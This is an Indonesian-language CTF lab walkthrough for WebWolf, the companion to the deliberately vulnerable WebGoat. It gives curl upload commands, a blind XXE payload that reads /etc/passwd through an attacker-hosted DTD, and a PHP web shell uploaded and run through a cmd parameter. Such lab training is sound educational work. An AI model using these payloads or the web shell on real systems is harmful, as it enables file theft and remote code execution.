TDCTF Academy Logo TDCTF ACADEMY

WebWolf - File Upload & Landing Point

Target: webwolf.vuln.cybersecurity.or.id:9092 | Level: Menengah | Tools: curl, Browser

Challenge

WebWolf adalah aplikasi pendamping WebGoat yang berfungsi sebagai:

  • File Landing - menerima file yang dikirim dari serangan Blind XXE
  • File Upload - upload shell untuk RCE

1. File Landing & Upload

Langkah 1: Upload File

# Buat file teks sederhana
echo "FLAG{R4h4s14_3ksf1ltr4s1}" > /tmp/secret.txt

# Upload ke WebWolf
curl -X POST http://webwolf.vuln.cybersecurity.or.id:9092/WebWolf/fileupload \\
-F "file=@/tmp/secret.txt"

Langkah 2: Akses File yang Diupload

File akan tersedia di URL:

http://webwolf.vuln.cybersecurity.or.id:9092/WebWolf/files/<username>/secret.txt

2. Blind XXE dengan WebWolf

Kombinasi dengan WebGoat

  1. Buat DTD file yang berisi entity untuk exfiltrasi:
echo '<!ENTITY exfil SYSTEM "file:///etc/passwd">' > /tmp/attack.dtd
curl -X POST http://webwolf.vuln.cybersecurity.or.id:9092/WebWolf/fileupload \\
-F "file=@/tmp/attack.dtd"
  1. Dari WebGoat, kirim XXE yang merujuk ke DTD di WebWolf:
<?xml version="1.0"?>
<!DOCTYPE user [
<!ENTITY % xxe SYSTEM "http://webwolf.vuln.cybersecurity.or.id:9092/WebWolf/files/username/attack.dtd">
%xxe;
]>
<comment><text>&exfil;</text></comment>

3. File Upload - PHP Shell

Upload Web Shell

# Buat PHP shell
cat > /tmp/shell.php << 'EOF'
<?php system($_GET['cmd']); ?>
EOF

# Upload
curl -X POST http://webwolf.vuln.cybersecurity.or.id:9092/WebWolf/fileupload \\
-F "file=@/tmp/shell.php"

# Akses shell
curl "http://webwolf.vuln.cybersecurity.or.id:9092/WebWolf/files/username/shell.php?cmd=id"

Kesimpulan

Fitur Kegunaan
File Landing Menerima hasil exfiltrasi dari Blind XXE
File Upload Upload shell atau payload
File Access Akses file yang sudah diupload

Walkthrough ini disusun untuk tujuan edukasi keamanan siber. Generated by @farishhz Agent Pentest Pipeline - TDCTF Security Academy

PADA HALAMAN INI